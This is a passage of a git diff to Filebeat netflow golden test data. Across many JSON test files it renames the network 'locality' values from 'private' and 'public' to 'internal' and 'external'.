"172.16.32.201", @@ -565,7 +565,7 @@ }, "source": { "ip": "172.16.32.1", - "locality": "private", + "locality": "internal", "mac": "00:50:56:c0:00:01", "port": 59159 } @@ -579,7 +579,7 @@ "Fields": { "destination": { "ip": "172.16.32.1", - "locality": "private", + "locality": "internal", "mac": "00:50:56:c0:00:01", "port": 59159 }, @@ -596,7 +596,7 @@ }, "flow": { "id": "3TmuMjQR8Mk", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "172.16.32.1", @@ -632,7 +632,7 @@ }, "source": { "ip": "172.16.32.201", - "locality": "private", + "locality": "internal", "mac": "00:0c:29:70:86:09", "port": 139 } @@ -646,7 +646,7 @@ "Fields": { "destination": { "ip": "172.16.32.201", - "locality": "private", + "locality": "internal", "mac": "00:0c:29:70:86:09", "port": 23 }, @@ -663,7 +663,7 @@ }, "flow": { "id": "2KDgFVtVKGg", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "172.16.32.201", @@ -699,7 +699,7 @@ }, "source": { "ip": "172.16.32.1", - "locality": "private", + "locality": "internal", "mac": "00:50:56:c0:00:01", "port": 59160 } @@ -713,7 +713,7 @@ "Fields": { "destination": { "ip": "172.16.32.1", - "locality": "private", + "locality": "internal", "mac": "00:50:56:c0:00:01", "port": 59160 }, @@ -730,7 +730,7 @@ }, "flow": { "id": "2KDgFVtVKGg", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "172.16.32.1", @@ -766,7 +766,7 @@ }, "source": { "ip": "172.16.32.201", - "locality": "private", + "locality": "internal", "mac": "00:0c:29:70:86:09", "port": 23 } @@ -780,7 +780,7 @@ "Fields": { "destination": { "ip": "172.16.32.201", - "locality": "private", + "locality": "internal", "mac": "00:0c:29:70:86:09", "port": 995 }, @@ -797,7 +797,7 @@ }, "flow": { "id": "vwr6dNcr6FE", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "172.16.32.201", @@ -833,7 +833,7 @@ }, "source": { "ip": "172.16.32.1", - "locality": "private", + "locality": "internal", "mac": "00:50:56:c0:00:01", "port": 59161 } @@ -847,7 +847,7 @@ "Fields": { "destination": { "ip": "172.16.32.1", - "locality": "private", + "locality": "internal", "mac": "00:50:56:c0:00:01", "port": 59161 }, @@ -864,7 +864,7 @@ }, "flow": { "id": "vwr6dNcr6FE", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "172.16.32.1", @@ -900,7 +900,7 @@ }, "source": { "ip": "172.16.32.201", - "locality": "private", + "locality": "internal", "mac": "00:0c:29:70:86:09", "port": 995 } @@ -914,7 +914,7 @@ "Fields": { "destination": { "ip": "172.16.32.201", - "locality": "private", + "locality": "internal", "mac": "00:0c:29:70:86:09", "port": 443 }, @@ -931,7 +931,7 @@ }, "flow": { "id": "tmgCubSF_CU", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "172.16.32.201", @@ -967,7 +967,7 @@ }, "source": { "ip": "172.16.32.1", - "locality": "private", + "locality": "internal", "mac": "00:50:56:c0:00:01", "port": 59162 } @@ -981,7 +981,7 @@ "Fields": { "destination": { "ip": "172.16.32.1", - "locality": "private", + "locality": "internal", "mac": "00:50:56:c0:00:01", "port": 59162 }, @@ -998,7 +998,7 @@ }, "flow": { "id": "tmgCubSF_CU", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "172.16.32.1", @@ -1034,7 +1034,7 @@ }, "source": { "ip": "172.16.32.201", - "locality": "private", + "locality": "internal", "mac": "00:0c:29:70:86:09", "port": 443 } @@ -1048,7 +1048,7 @@ "Fields": { "destination": { "ip": "172.16.32.201", - "locality": "private", + "locality": "internal", "mac": "00:0c:29:70:86:09", "port": 135 }, @@ -1065,7 +1065,7 @@ }, "flow": { "id": "Agzgga7RAr0", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "172.16.32.201", @@ -1101,7 +1101,7 @@ }, "source": { "ip": "172.16.32.1", - "locality": "private", + "locality": "internal", "mac": "00:50:56:c0:00:01", "port": 59163 } @@ -1115,7 +1115,7 @@ "Fields": { "destination": { "ip": "172.16.32.1", - "locality": "private", + "locality": "internal", "mac": "00:50:56:c0:00:01", "port": 59163 }, @@ -1132,7 +1132,7 @@ }, "flow": { "id": "Agzgga7RAr0", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "172.16.32.1", @@ -1168,7 +1168,7 @@ }, "source": { "ip": "172.16.32.201", - "locality": "private", + "locality": "internal", "mac": "00:0c:29:70:86:09", "port": 135 } @@ -1182,7 +1182,7 @@ "Fields": { "destination": { "ip": "172.16.32.201", - "locality": "private", + "locality": "internal", "mac": "00:0c:29:70:86:09", "port": 110 }, @@ -1199,7 +1199,7 @@ }, "flow": { "id": "-cqFlm16mLc", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "172.16.32.201", @@ -1235,7 +1235,7 @@ }, "source": { "ip": "172.16.32.1", - "locality": "private", + "locality": "internal", "mac": "00:50:56:c0:00:01", "port": 59164 } @@ -1249,7 +1249,7 @@ "Fields": { "destination": { "ip": "172.16.32.1", - "locality": "private", + "locality": "internal", "mac": "00:50:56:c0:00:01", "port": 59164 }, @@ -1266,7 +1266,7 @@ }, "flow": { "id": "-cqFlm16mLc", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "172.16.32.1", @@ -1302,7 +1302,7 @@ }, "source": { "ip": "172.16.32.201", - "locality": "private", + "locality": "internal", "mac": "00:0c:29:70:86:09", "port": 110 } @@ -1316,7 +1316,7 @@ "Fields": { "destination": { "ip": "172.16.32.201", - "locality": "private", + "locality": "internal", "mac": "00:0c:29:70:86:09", "port": 111 }, @@ -1333,7 +1333,7 @@ }, "flow": { "id": "Txfldw7-948", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "172.16.32.201", @@ -1369,7 +1369,7 @@ }, "source": { "ip": "172.16.32.1", - "locality": "private", + "locality": "internal", "mac": "00:50:56:c0:00:01", "port": 59165 } @@ -1383,7 +1383,7 @@ "Fields": { "destination": { "ip": "172.16.32.1", - "locality": "private", + "locality": "internal", "mac": "00:50:56:c0:00:01", "port": 59165 }, @@ -1400,7 +1400,7 @@ }, "flow": { "id": "Txfldw7-948", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "172.16.32.1", @@ -1436,7 +1436,7 @@ }, "source": { "ip": "172.16.32.201", - "locality": "private", + "locality": "internal", "mac": "00:0c:29:70:86:09", "port": 111 } @@ -1450,7 +1450,7 @@ "Fields": { "destination": { "ip": "172.16.32.201", - "locality": "private", + "locality": "internal", "mac": "00:0c:29:70:86:09", "port": 143 }, @@ -1467,7 +1467,7 @@ }, "flow": { "id": "iaXg6w051Ho", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "172.16.32.201", @@ -1503,7 +1503,7 @@ }, "source": { "ip": "172.16.32.1", - "locality": "private", + "locality": "internal", "mac": "00:50:56:c0:00:01", "port": 59166 } @@ -1517,7 +1517,7 @@ "Fields": { "destination": { "ip": "172.16.32.1", - "locality": "private", + "locality": "internal", "mac": "00:50:56:c0:00:01", "port": 59166 }, @@ -1534,7 +1534,7 @@ }, "flow": { "id": "iaXg6w051Ho", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "172.16.32.1", @@ -1570,7 +1570,7 @@ }, "source": { "ip": "172.16.32.201", - "locality": "private", + "locality": "internal", "mac": "00:0c:29:70:86:09", "port": 143 } @@ -1584,7 +1584,7 @@ "Fields": { "destination": { "ip": "172.16.32.201", - "locality": "private", + "locality": "internal", "mac": "00:0c:29:70:86:09", "port": 3389 }, @@ -1601,7 +1601,7 @@ }, "flow": { "id": "cEvEMCFhKJk", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "172.16.32.201", @@ -1637,7 +1637,7 @@ }, "source": { "ip": "172.16.32.1", - "locality": "private", + "locality": "internal", "mac": "00:50:56:c0:00:01", "port": 59167 } @@ -1651,7 +1651,7 @@ "Fields": { "destination": { "ip": "172.16.32.1", - "locality": "private", + "locality": "internal", "mac": "00:50:56:c0:00:01", "port": 59167 }, @@ -1668,7 +1668,7 @@ }, "flow": { "id": "cEvEMCFhKJk", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "172.16.32.1", @@ -1704,7 +1704,7 @@ }, "source": { "ip": "172.16.32.201", - "locality": "private", + "locality": "internal", "mac": "00:0c:29:70:86:09", "port": 3389 } @@ -1718,7 +1718,7 @@ "Fields": { "destination": { "ip": "172.16.32.201", - "locality": "private", + "locality": "internal", "mac": "00:0c:29:70:86:09", "port": 80 }, @@ -1735,7 +1735,7 @@ }, "flow": { "id": "DnN0kX-gR3Q", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "172.16.32.201", @@ -1771,7 +1771,7 @@ }, "source": { "ip": "172.16.32.1", - "locality": "private", + "locality": "internal", "mac": "00:50:56:c0:00:01", "port": 59168 } @@ -1785,7 +1785,7 @@ "Fields": { "destination": { "ip": "172.16.32.1", - "locality": "private", + "locality": "internal", "mac": "00:50:56:c0:00:01", "port": 59168 }, @@ -1802,7 +1802,7 @@ }, "flow": { "id": "DnN0kX-gR3Q", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "172.16.32.1", @@ -1838,7 +1838,7 @@ }, "source": { "ip": "172.16.32.201", - "locality": "private", + "locality": "internal", "mac": "00:0c:29:70:86:09", "port": 80 } @@ -1852,7 +1852,7 @@ "Fields": { "destination": { "ip": "172.16.32.201", - "locality": "private", + "locality": "internal", "mac": "00:0c:29:70:86:09", "port": 25 }, @@ -1869,7 +1869,7 @@ }, "flow": { "id": "-kLcuxmRzgk", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "172.16.32.201", @@ -1905,7 +1905,7 @@ }, "source": { "ip": "172.16.32.1", - "locality": "private", + "locality": "internal", "mac": "00:50:56:c0:00:01", "port": 59169 } @@ -1919,7 +1919,7 @@ "Fields": { "destination": { "ip": "172.16.32.1", - "locality": "private", + "locality": "internal", "mac": "00:50:56:c0:00:01", "port": 59169 }, @@ -1936,7 +1936,7 @@ }, "flow": { "id": "-kLcuxmRzgk", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "172.16.32.1", @@ -1972,7 +1972,7 @@ }, "source": { "ip": "172.16.32.201", - "locality": "private", + "locality": "internal", "mac": "00:0c:29:70:86:09", "port": 25 } diff --git a/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-multiple-netflow-exporters.golden.json b/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-multiple-netflow-exporters.golden.json index 67a9901764b7..4238292f2505 100644 --- a/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-multiple-netflow-exporters.golden.json +++ b/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-multiple-netflow-exporters.golden.json @@ -43,7 +43,7 @@ "Fields": { "destination": { "ip": "172.16.32.248", - "locality": "private", + "locality": "internal", "port": 123 }, "event": { @@ -62,7 +62,7 @@ }, "flow": { "id": "1E-M5OJg_go", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "172.16.32.248", @@ -108,7 +108,7 @@ "source": { "bytes": 76, "ip": "172.16.32.100", - "locality": "private", + "locality": "internal", "packets": 1, "port": 123 } @@ -122,7 +122,7 @@ "Fields": { "destination": { "ip": "172.16.32.100", - "locality": "private", + "locality": "internal", "port": 123 }, "event": { @@ -141,7 +141,7 @@ }, "flow": { "id": "yMxFd8CW_Ok", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "172.16.32.100", @@ -187,7 +187,7 @@ "source": { "bytes": 76, "ip": "172.16.32.248", - "locality": "private", + "locality": "internal", "packets": 1, "port": 123 } @@ -201,7 +201,7 @@ "Fields": { "destination": { "ip": "172.16.32.201", - "locality": "private", + "locality": "internal", "port": 123 }, "event": { @@ -220,7 +220,7 @@ }, "flow": { "id": "NF1W3jyrHAA", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "172.16.32.201", @@ -266,7 +266,7 @@ "source": { "bytes": 76, "ip": "172.16.32.100", - "locality": "private", + "locality": "internal", "packets": 1, "port": 123 } @@ -280,7 +280,7 @@ "Fields": { "destination": { "ip": "172.16.32.100", - "locality": "private", + "locality": "internal", "port": 123 }, "event": { @@ -299,7 +299,7 @@ }, "flow": { "id": "Tw1iOKJ-dfE", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "172.16.32.100", @@ -345,7 +345,7 @@ "source": { "bytes": 76, "ip": "172.16.32.201", - "locality": "private", + "locality": "internal", "packets": 1, "port": 123 } @@ -359,7 +359,7 @@ "Fields": { "destination": { "ip": "172.16.32.202", - "locality": "private", + "locality": "internal", "port": 123 }, "event": { @@ -378,7 +378,7 @@ }, "flow": { "id": "sNF38-obC7k", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "172.16.32.202", @@ -424,7 +424,7 @@ "source": { "bytes": 76, "ip": "172.16.32.100", - "locality": "private", + "locality": "internal", "packets": 1, "port": 123 } @@ -438,7 +438,7 @@ "Fields": { "destination": { "ip": "172.16.32.100", - "locality": "private", + "locality": "internal", "port": 123 }, "event": { @@ -457,7 +457,7 @@ }, "flow": { "id": "458D6voFu3E", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "172.16.32.100", @@ -503,7 +503,7 @@ "source": { "bytes": 76, "ip": "172.16.32.202", - "locality": "private", + "locality": "internal", "packets": 1, "port": 123 } @@ -534,7 +534,7 @@ }, "flow": { "id": "tYpw8DU5u10", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv6_address": "ff02::1", @@ -586,7 +586,7 @@ "Fields": { "destination": { "ip": "172.16.32.1", - "locality": "private", + "locality": "internal", "port": 65058 }, "event": { @@ -605,7 +605,7 @@ }, "flow": { "id": "zQfsdfKgh-o", - "locality": "private" + "locality": "internal" }, "netflow": { "bgp_destination_as_number": 0, @@ -655,7 +655,7 @@ "source": { "bytes": 200, "ip": "172.16.32.201", - "locality": "private", + "locality": "internal", "packets": 2, "port": 22 } diff --git a/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-nprobe-DPI-L7.golden.json b/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-nprobe-DPI-L7.golden.json index 25307e840bdf..3e6a1d037191 100644 --- a/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-nprobe-DPI-L7.golden.json +++ b/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-nprobe-DPI-L7.golden.json @@ -7,7 +7,7 @@ "Fields": { "destination": { "ip": "0.0.0.0", - "locality": "private", + "locality": "internal", "port": 0 }, "event": { @@ -23,7 +23,7 @@ }, "flow": { "id": "oFN7CMNpOLQ", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "AAAAUg==", @@ -66,7 +66,7 @@ "source": { "bytes": 82, "ip": "0.0.0.0", - "locality": "private", + "locality": "internal", "packets": 1, "port": 0 } diff --git a/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-template-with-0-length-fields.golden.json b/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-template-with-0-length-fields.golden.json index e0189eebddbc..65a849e632af 100644 --- a/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-template-with-0-length-fields.golden.json +++ b/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-template-with-0-length-fields.golden.json @@ -7,7 +7,7 @@ "Fields": { "destination": { "ip": "192.168.1.80", - "locality": "private", + "locality": "internal", "port": 0 }, "event": { @@ -26,7 +26,7 @@ }, "flow": { "id": "BSsjrf_TZnk", - "locality": "public" + "locality": "external" }, "netflow": { "destination_ipv4_address": "192.168.1.80", @@ -76,7 +76,7 @@ "source": { "bytes": 0, "ip": "239.255.255.250", - "locality": "public", + "locality": "external", "packets": 0, "port": 0 } @@ -90,7 +90,7 @@ "Fields": { "destination": { "ip": "239.255.255.250", - "locality": "public", + "locality": "external", "port": 0 }, "event": { @@ -109,7 +109,7 @@ }, "flow": { "id": "R1Sjz_ITbgo", - "locality": "public" + "locality": "external" }, "netflow": { "destination_ipv4_address": "239.255.255.250", @@ -159,7 +159,7 @@ "source": { "bytes": 0, "ip": "192.168.1.80", - "locality": "private", + "locality": "internal", "packets": 0, "port": 0 } @@ -173,7 +173,7 @@ "Fields": { "destination": { "ip": "192.168.1.95", - "locality": "private", + "locality": "internal", "port": 0 }, "event": { @@ -192,7 +192,7 @@ }, "flow": { "id": "FpUgB2PIhjQ", - "locality": "public" + "locality": "external" }, "netflow": { "destination_ipv4_address": "192.168.1.95", @@ -242,7 +242,7 @@ "source": { "bytes": 0, "ip": "239.255.255.250", - "locality": "public", + "locality": "external", "packets": 0, "port": 0 } @@ -256,7 +256,7 @@ "Fields": { "destination": { "ip": "239.255.255.250", - "locality": "public", + "locality": "external", "port": 0 }, "event": { @@ -275,7 +275,7 @@ }, "flow": { "id": "qN8iQExOvkc", - "locality": "public" + "locality": "external" }, "netflow": { "destination_ipv4_address": "239.255.255.250", @@ -325,7 +325,7 @@ "source": { "bytes": 32, "ip": "192.168.1.95", - "locality": "private", + "locality": "internal", "packets": 1, "port": 0 } @@ -339,7 +339,7 @@ "Fields": { "destination": { "ip": "192.168.1.95", - "locality": "private", + "locality": "internal", "port": 0 }, "event": { @@ -358,7 +358,7 @@ }, "flow": { "id": "FpUgB2PIhjQ", - "locality": "public" + "locality": "external" }, "netflow": { "destination_ipv4_address": "192.168.1.95", @@ -408,7 +408,7 @@ "source": { "bytes": 0, "ip": "239.255.255.250", - "locality": "public", + "locality": "external", "packets": 0, "port": 0 } @@ -422,7 +422,7 @@ "Fields": { "destination": { "ip": "239.255.255.250", - "locality": "public", + "locality": "external", "port": 0 }, "event": { @@ -441,7 +441,7 @@ }, "flow": { "id": "qN8iQExOvkc", - "locality": "public" + "locality": "external" }, "netflow": { "destination_ipv4_address": "239.255.255.250", @@ -491,7 +491,7 @@ "source": { "bytes": 0, "ip": "192.168.1.95", - "locality": "private", + "locality": "internal", "packets": 0, "port": 0 } @@ -505,7 +505,7 @@ "Fields": { "destination": { "ip": "192.168.1.33", - "locality": "private", + "locality": "internal", "port": 0 }, "event": { @@ -524,7 +524,7 @@ }, "flow": { "id": "WuFpyBG1Gt0", - "locality": "public" + "locality": "external" }, "netflow": { "destination_ipv4_address": "192.168.1.33", @@ -574,7 +574,7 @@ "source": { "bytes": 0, "ip": "239.255.255.250", - "locality": "public", + "locality": "external", "packets": 0, "port": 0 } @@ -588,7 +588,7 @@ "Fields": { "destination": { "ip": "239.255.255.250", - "locality": "public", + "locality": "external", "port": 0 }, "event": { @@ -607,7 +607,7 @@ }, "flow": { "id": "1aysHUs7BpA", - "locality": "public" + "locality": "external" }, "netflow": { "destination_ipv4_address": "239.255.255.250", @@ -657,7 +657,7 @@ "source": { "bytes": 32, "ip": "192.168.1.33", - "locality": "private", + "locality": "internal", "packets": 1, "port": 0 } @@ -671,7 +671,7 @@ "Fields": { "destination": { "ip": "192.168.1.33", - "locality": "private", + "locality": "internal", "port": 0 }, "event": { @@ -690,7 +690,7 @@ }, "flow": { "id": "WuFpyBG1Gt0", - "locality": "public" + "locality": "external" }, "netflow": { "destination_ipv4_address": "192.168.1.33", @@ -740,7 +740,7 @@ "source": { "bytes": 0, "ip": "239.255.255.250", - "locality": "public", + "locality": "external", "packets": 0, "port": 0 } @@ -754,7 +754,7 @@ "Fields": { "destination": { "ip": "239.255.255.250", - "locality": "public", + "locality": "external", "port": 0 }, "event": { @@ -773,7 +773,7 @@ }, "flow": { "id": "1aysHUs7BpA", - "locality": "public" + "locality": "external" }, "netflow": { "destination_ipv4_address": "239.255.255.250", @@ -823,7 +823,7 @@ "source": { "bytes": 0, "ip": "192.168.1.33", - "locality": "private", + "locality": "internal", "packets": 0, "port": 0 } diff --git a/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-valid-01.golden.json b/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-valid-01.golden.json index 5d90c00cc64d..20ea4e61d315 100644 --- a/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-valid-01.golden.json +++ b/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-valid-01.golden.json @@ -7,7 +7,7 @@ "Fields": { "destination": { "ip": "172.16.32.248", - "locality": "private", + "locality": "internal", "port": 123 }, "event": { @@ -26,7 +26,7 @@ }, "flow": { "id": "1E-M5OJg_go", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "172.16.32.248", @@ -72,7 +72,7 @@ "source": { "bytes": 76, "ip": "172.16.32.100", - "locality": "private", + "locality": "internal", "packets": 1, "port": 123 } @@ -86,7 +86,7 @@ "Fields": { "destination": { "ip": "172.16.32.100", - "locality": "private", + "locality": "internal", "port": 123 }, "event": { @@ -105,7 +105,7 @@ }, "flow": { "id": "yMxFd8CW_Ok", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "172.16.32.100", @@ -151,7 +151,7 @@ "source": { "bytes": 76, "ip": "172.16.32.248", - "locality": "private", + "locality": "internal", "packets": 1, "port": 123 } @@ -165,7 +165,7 @@ "Fields": { "destination": { "ip": "172.16.32.201", - "locality": "private", + "locality": "internal", "port": 123 }, "event": { @@ -184,7 +184,7 @@ }, "flow": { "id": "NF1W3jyrHAA", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "172.16.32.201", @@ -230,7 +230,7 @@ "source": { "bytes": 76, "ip": "172.16.32.100", - "locality": "private", + "locality": "internal", "packets": 1, "port": 123 } @@ -244,7 +244,7 @@ "Fields": { "destination": { "ip": "172.16.32.100", - "locality": "private", + "locality": "internal", "port": 123 }, "event": { @@ -263,7 +263,7 @@ }, "flow": { "id": "Tw1iOKJ-dfE", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "172.16.32.100", @@ -309,7 +309,7 @@ "source": { "bytes": 76, "ip": "172.16.32.201", - "locality": "private", + "locality": "internal", "packets": 1, "port": 123 } @@ -323,7 +323,7 @@ "Fields": { "destination": { "ip": "172.16.32.202", - "locality": "private", + "locality": "internal", "port": 123 }, "event": { @@ -342,7 +342,7 @@ }, "flow": { "id": "sNF38-obC7k", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "172.16.32.202", @@ -388,7 +388,7 @@ "source": { "bytes": 76, "ip": "172.16.32.100", - "locality": "private", + "locality": "internal", "packets": 1, "port": 123 } @@ -402,7 +402,7 @@ "Fields": { "destination": { "ip": "172.16.32.100", - "locality": "private", + "locality": "internal", "port": 123 }, "event": { @@ -421,7 +421,7 @@ }, "flow": { "id": "458D6voFu3E", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "172.16.32.100", @@ -467,7 +467,7 @@ "source": { "bytes": 76, "ip": "172.16.32.202", - "locality": "private", + "locality": "internal", "packets": 1, "port": 123 } @@ -498,7 +498,7 @@ }, "flow": { "id": "tYpw8DU5u10", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv6_address": "ff02::1", diff --git a/x-pack/filebeat/input/netflow/testdata/golden/ipfix_cisco.pcap.golden.json b/x-pack/filebeat/input/netflow/testdata/golden/ipfix_cisco.pcap.golden.json index b67858c32e43..149355177e94 100644 --- a/x-pack/filebeat/input/netflow/testdata/golden/ipfix_cisco.pcap.golden.json +++ b/x-pack/filebeat/input/netflow/testdata/golden/ipfix_cisco.pcap.golden.json @@ -23,7 +23,7 @@ }, "flow": { "id": "Vhs9T5k296w", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "AwAAUA==", @@ -110,7 +110,7 @@ }, "flow": { "id": "Vhs9T5k296w", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "AwAAUA==", @@ -197,7 +197,7 @@ }, "flow": { "id": "Vhs9T5k296w", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "DQACCA==", @@ -284,7 +284,7 @@ }, "flow": { "id": "Vhs9T5k296w", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "AwAAUA==", @@ -371,7 +371,7 @@ }, "flow": { "id": "Vhs9T5k296w", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "AwAAUA==", @@ -458,7 +458,7 @@ }, "flow": { "id": "Vhs9T5k296w", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "DQABxQ==", @@ -545,7 +545,7 @@ }, "flow": { "id": "Vhs9T5k296w", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "AwAAUA==", @@ -632,7 +632,7 @@ }, "flow": { "id": "Vhs9T5k296w", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "DQABxQ==", @@ -719,7 +719,7 @@ }, "flow": { "id": "Vhs9T5k296w", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "DQACYw==", @@ -806,7 +806,7 @@ }, "flow": { "id": "Vhs9T5k296w", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "DQAAMQ==", @@ -893,7 +893,7 @@ }, "flow": { "id": "Vhs9T5k296w", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "DQABxQ==", @@ -980,7 +980,7 @@ }, "flow": { "id": "Vhs9T5k296w", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "DQACYw==", @@ -1067,7 +1067,7 @@ }, "flow": { "id": "Vhs9T5k296w", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "DQACCA==", @@ -1154,7 +1154,7 @@ }, "flow": { "id": "Vhs9T5k296w", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "DQABxQ==", @@ -1241,7 +1241,7 @@ }, "flow": { "id": "Vhs9T5k296w", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "DQABxQ==", @@ -1328,7 +1328,7 @@ }, "flow": { "id": "Vhs9T5k296w", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "DQAAAQ==", @@ -1415,7 +1415,7 @@ }, "flow": { "id": "Vhs9T5k296w", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "DQABxQ==", @@ -1502,7 +1502,7 @@ }, "flow": { "id": "Vhs9T5k296w", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "DQABxQ==", @@ -1589,7 +1589,7 @@ }, "flow": { "id": "Vhs9T5k296w", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "AwAAUA==", @@ -1676,7 +1676,7 @@ }, "flow": { "id": "Vhs9T5k296w", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "DQACZg==", @@ -1763,7 +1763,7 @@ }, "flow": { "id": "Vhs9T5k296w", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "DQACYw==", @@ -1850,7 +1850,7 @@ }, "flow": { "id": "Vhs9T5k296w", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "AwAFmQ==", @@ -1937,7 +1937,7 @@ }, "flow": { "id": "Vhs9T5k296w", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "AwAAUA==", @@ -2024,7 +2024,7 @@ }, "flow": { "id": "Vhs9T5k296w", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "DQABxQ==", @@ -2111,7 +2111,7 @@ }, "flow": { "id": "Vhs9T5k296w", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "AwAFmQ==", @@ -2198,7 +2198,7 @@ }, "flow": { "id": "Vhs9T5k296w", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "DQABxQ==", @@ -2285,7 +2285,7 @@ }, "flow": { "id": "Vhs9T5k296w", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "DQABxQ==", @@ -2372,7 +2372,7 @@ }, "flow": { "id": "Vhs9T5k296w", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "DQABxQ==", @@ -2459,7 +2459,7 @@ }, "flow": { "id": "Vhs9T5k296w", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "DQACYw==", diff --git a/x-pack/filebeat/input/netflow/testdata/golden/netflow9_e10s_4_7byte_pad.pcap.golden.json b/x-pack/filebeat/input/netflow/testdata/golden/netflow9_e10s_4_7byte_pad.pcap.golden.json index 6a8448a65c1b..82a9efb87aac 100644 --- a/x-pack/filebeat/input/netflow/testdata/golden/netflow9_e10s_4_7byte_pad.pcap.golden.json +++ b/x-pack/filebeat/input/netflow/testdata/golden/netflow9_e10s_4_7byte_pad.pcap.golden.json @@ -7,7 +7,7 @@ "Fields": { "destination": { "ip": "10.36.236.100", - "locality": "private", + "locality": "internal", "port": 54594 }, "event": { @@ -23,7 +23,7 @@ }, "flow": { "id": "6mUV1nPVG80", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "10.36.236.100", @@ -68,7 +68,7 @@ "source": { "bytes": 1855, "ip": "10.127.32.11", - "locality": "private", + "locality": "internal", "packets": 5, "port": 53 } @@ -82,7 +82,7 @@ "Fields": { "destination": { "ip": "10.36.237.22", - "locality": "private", + "locality": "internal", "port": 52058 }, "event": { @@ -98,7 +98,7 @@ }, "flow": { "id": "3BTOVt9gp8I", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "10.36.237.22", @@ -143,7 +143,7 @@ "source": { "bytes": 217, "ip": "10.36.228.103", - "locality": "private", + "locality": "internal", "packets": 3, "port": 8000 } @@ -157,7 +157,7 @@ "Fields": { "destination": { "ip": "10.127.32.11", - "locality": "private", + "locality": "internal", "port": 53 }, "event": { @@ -173,7 +173,7 @@ }, "flow": { "id": "6mUV1nPVG80", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "10.127.32.11", @@ 